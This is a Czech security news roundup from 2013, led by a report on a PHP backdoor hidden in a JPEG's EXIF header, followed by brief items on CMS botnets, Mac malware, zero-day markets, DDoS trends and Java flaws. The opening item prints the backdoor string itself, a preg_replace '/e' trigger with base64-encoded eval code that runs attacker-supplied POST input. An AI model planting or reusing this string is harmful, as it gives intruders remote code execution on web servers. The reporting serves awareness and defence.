Postřehy z bezpečnosti: backdoor ukrytý v obrázku

Martin Čmelík 22. 7. 2013

Peter Gramantik ze společnosti Sucuri objevil nový typ útoku, kdy se kód umožnující vzdálené spuštění PHP kódu ukrýval v EXIF hlavičce obrázku. Útočníci stáhli obrázek, modifikovali jeho hlavičky a uploadnuli ho zpět, přičemž obrázek jako takový bylo pořád možné zobrazit v prohlížeči.

Jednalo se o použití nepříliš známé možnosti PHP funkce preg_replace, kdy při vložení modifikátoru „/e“ je možné spustit kód. Kód v obrázku pak vypadal takto:

ÿØÿà^@^PJFIF^@^A^B^@^@d^@d^@^@ÿá^@¡Exif^@^@II*^@
^H^@^@^@^B^@^O^A^B^@^F^@^@^@&^@^@^@^P^A^B^@m^@^@^@,^@^@^@^@^@^@^@/.*/e^
@ eval ( base64_decode("aWYgKGl zc2V0KCRfUE9TVFsie noxIl0pKSB7ZXZhbChzd
HJpcHNsYXNoZXMoJF9QT1NUWyJ6ejEiXSkpO30='));
@ÿì^@^QDucky^@^A^@^D^@^@^@<^@^@ÿî^@^NAdobe^

Naše postřehy

WordPress, Joomla, Drupal. Toto trio obhospodařuje velkou část webů, a proto také útočníci cílí na chyby v těchto CMS. Např. jen WordPress běží na více než 60 miliónech stránek a existují i botnety složené jen ze serverů napadených instancí WP. Každý útočník schopný najít novou vulnerabilitu v CMS nebo v některém z populárních modulů si tak může rychle vytvořit velký botnet. Bezpečnost CMS lze zvýšit instalací několika security modulů, ale to je nad rámec postřehů, takže plánuji sepsat článek na toto téma.

NSS (Network Security Services) je kolekce kryptografických knihoven, které používá (mimo jiné) např. Firefox. V poslední verzi podporuje TLS 1.2. Patch, který umožňuje použití AES Galois Counter Module (GCM), byl již poslán k review a jeho největší výhodou by mělo být zábránění útokům typu BEAST a Lucky 13.

Edward Snowden byl nominován na Nobelovu cenu míru švédským profesorem sociologie.

Společnost F-Secure objevila malware pro systém Mac OS X. Používá techniku RLO (Right-to-Left Oriented), která se používá při zobrazování arabských, hebrejských apod. jazyků, a tím tak skrývá nebezpečnou část kódu, která zaznamenává dění na monitoru, zvuk a čeká na další příkazy z C&C serveru. Aplikace napsaná v Pythonu byla navíc podepsána validním Apple Developer ID, takže systém ani neupozornil na spuštění kódu z nedůvěryhodného zdroje, což normálně dělá.

Podle průzkumu IDC se téměř polovina dotázaných společností obává nových sofistikovaných útoků. Zcela oprávněně. Kaspersky uvádí, že 87% nových vzorků škodlivých kódu bylo zachyceno heuristickou analýzou. Proto věnuje velké usilí vylepšování toho enginu a představuje i další moduly schopné rozeznat chování škodlivého kódu v systému.

Za 0day chyby nejlépe platí USA/NSA a další státy. Ačkoliv má již mnoho společností bug bounty program, tak se hackerům stále více vyplatí o chybě tiše informovat státní organizace, které jsou velice častým zákazníkem, a jejich cena snadno předčí limity bug bounty programů. K nejznámějším společnostem, které si na tomto poli vytvořily dobré živobytí, patří Vupen a ReVuln.

Byla objevena další chyba umožnující oklamání ověřování APK souborů na Android zařízeních.

Podle zprávy společnosti Prolexic, prodávající drahé korporátní řešení ochrany proti DoS/DDoS útokům, se rapidně zvýšily průměrné hodnoty útoků oproti minulému roku. Průměrný počet paketů za vteřinu je teď na hodnotě 47,4 Mpps a průměrný bandwidth 49,24 Gbps. Zaznamenaný počet útoků se zvýšil o 33 %. Vzhledem k tomu, že cena za provedení útoku na server se oproti tomu stále snižuje a málokterý hosting ochranu proti DoS/DDoS nabízí, tak vyhlídky do budoucna nejsou příznivé.

Odborníci ze společnosti Lookout, zabývající se mobilní bezpečností, objevili chybu v Google Glass umožňující pomocí škodlivého QR kódu přepojit tiše uživatele na WiFi útočníka a odposlouchávat přenos dat z brýlí do Internetu. Video s ukázkou bylo z YouTube smazáno, ale imho šlo o použití QR kódu obsahující informace o připojení na WiFi síť, který si můžete vygenerovat např. zde.

Pokud používáte na iPhonu/iPadu aplikaci Tumblr, tak si změnte heslo, protože podle informací to vypadá tak, že se při přihlašování na servery nepoužívalo šifrované spojení a bylo tak možné jednoduše odposlechnout vaše přihlašovací údaje (při přístupu přes WiFi).

V dalším díle od Briana Krebse se dozvíte o nové funkci Styx Crypt exploit kitu, umožňující scanování až sedmnácti antivirovými enginy, abyste věděli, které z nich jsou schopny detekovat váš malware. Je známo, že server virustotal.com spolupracuje s antivirovými společnostmi, takže není dobré své kousky testovat zde, protože se na váš kód velice rychle objeví signatura. Dále popisuje propojení lidí za tímto exploit kitem se službou poskytující ochranu proti DDoS útokům.

V minulém dílu jsme informovali o doplňkách pro Firefox, které mohou být užitečné při pentestingu vašich aplikací. Zde máte podobný seznam pro Google Chrome.

Společnosti Google, Facebook, Twitter, Microsoft, Yahoo, EEF a další, napsali dopis adresovaný Baracku Obamovi, řediteli NSA a dalším špičkách, ve kterém žádají o transparentnost NSA a o možnost zveřejňovat informace o přístupech NSA k jejich datům. Něco jako transparency report, který publikuje Google. Zbožné přání.

Polští odborníci objevili chybu umožňující spuštění kódu v Javě SE 7 Update 25 a všech předchozích. Nic nového pod sluncem, pokud by nešlo o chybu zneužitelnou základním útokem známým přes deset let.

Další zprávou k tématu jsou výsledky průzkumu společnosti Bit9, ve které se tvrdí že 99 % společností používá na svých zařízeních (servery, počítače, notebooky, …) staré (rozuměj zranitelné) verze Javy. Málokteré společnosti řeší distribuci aktualizací aplikací třetích stran na klienty a proto mají útočníci mnoho cest jak napadnout korporátní stanice. Pokud Javu, Adobe Flash apod. nepotřebujete, tak je prostě odinstalujte, případně nechte zapnuté jen v prohlížeči, který primárně nepoužíváte. Díky nástupu HTML5 se bez toho dá poměrně dobře žít již dnes (nemám ani jedno již dva měsíce).

widgety

Článek pojednávající o botnetu, jehož primárním cílem je mining Bitcoinů a program umožnující výdělek za šíření programu pro ovládání z C&C serveru.

Závěr

Tento seriál vychází za pomoci příznivců a redaktorů serveru (RubberDuck) Security-Portal.cz. Uvítali bychom i vaši spolupráci na tvorbě obsahu tohoto seriálu. Pokud byste nás chtěli upozornit na zajímavý článek, tak nám napište na FB stránku, případně na Twitter. Děkujeme.

Našli jste v článku chybu?
Podnikatel.cz: Babišovi se nedá věřit, stěžovali si hospodští

Babišovi se nedá věřit, stěžovali si hospodští

Vitalia.cz: dTest odhalil ten nejlepší kečup

dTest odhalil ten nejlepší kečup

Podnikatel.cz: Jak na DPH u online služeb do třetích zemí?

Jak na DPH u online služeb do třetích zemí?

120na80.cz: Co je padesátkrát sladší než cukr?

Co je padesátkrát sladší než cukr?

DigiZone.cz: Světový pohár v přímém přenosu na ČT

Světový pohár v přímém přenosu na ČT

DigiZone.cz: Ginx TV: pořad o počítačových hráčích

Ginx TV: pořad o počítačových hráčích

Lupa.cz: Aukro.cz mění majitele. Vrací se do českých rukou

Aukro.cz mění majitele. Vrací se do českých rukou

Lupa.cz: Jak se prodává firma za miliardu?

Jak se prodává firma za miliardu?

Podnikatel.cz: EET pro e-shopy? Postavené na hlavu

EET pro e-shopy? Postavené na hlavu

Podnikatel.cz: Udělali jsme velkou chybu, napsal Čupr

Udělali jsme velkou chybu, napsal Čupr

Lupa.cz: Další Češi si nechali vložit do těla čip

Další Češi si nechali vložit do těla čip

Vitalia.cz: Jak Ondra o astma přišel

Jak Ondra o astma přišel

DigiZone.cz: Wimbledon na Nova Sport až do 2019

Wimbledon na Nova Sport až do 2019

Lupa.cz: Patička e-mailu závazná jako vlastnoruční podpis?

Patička e-mailu závazná jako vlastnoruční podpis?

Podnikatel.cz: Takhle se prodávají mražené potraviny

Takhle se prodávají mražené potraviny

Podnikatel.cz: Znáte už 5 novinek k #EET

Znáte už 5 novinek k #EET

Podnikatel.cz: Instalatér, malíř a elektrikář. "Vymřou"?

Instalatér, malíř a elektrikář. "Vymřou"?

Podnikatel.cz: Byla finanční manažerka, teď cvičí jógu

Byla finanční manažerka, teď cvičí jógu

DigiZone.cz: DVB-T2 ověřeno: seznam TV zveřejněn

DVB-T2 ověřeno: seznam TV zveřejněn

Podnikatel.cz: Kalousek chce odklad EET. Předvolební tah?

Kalousek chce odklad EET. Předvolební tah?